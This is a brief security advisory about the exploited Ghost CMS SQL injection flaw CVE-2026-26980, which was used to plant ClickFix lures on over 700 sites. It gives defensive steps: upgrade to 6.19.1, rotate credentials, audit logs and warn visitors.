Ghost CMS CVE-2026-26980 Exploited to Hijack 700+ Sites for ClickFix Attacks
Ghost CMS CVE-2026-26980 (CVSS 9.4) is being actively exploited to compromise 700+ sites with ClickFix malware. Upgrade to 6.19.1 and rotate all credentials now.
What’s new: A critical SQL injection vulnerability (CVE-2026-26980, CVSS score: 9.4) in Ghost CMS has been exploited to hijack over 700 websites for ClickFix social engineering attacks. The flaw allows unauthenticated attackers to access the admin API key, enabling injection of malicious JavaScript into site articles. Compromised sectors include universities, blockchain, AI, SaaS, security research, media, and fintech. The vulnerability was patched in Ghost CMS version 6.19.1, released in February 2026.
Who’s affected
Any Ghost CMS installation running a version earlier than 6.19.1 is vulnerable. Over 700 sites have already been confirmed compromised, spanning a broad range of industries and regions.
What to do
- Upgrade Ghost CMS to version 6.19.1 or newer immediately.
- Rotate all admin credentials and API keys associated with your Ghost instance.
- Audit access logs for suspicious API calls or unexpected JavaScript injections in published articles.
- Notify users who may have visited affected pages during the compromise window to be alert for ClickFix lures.
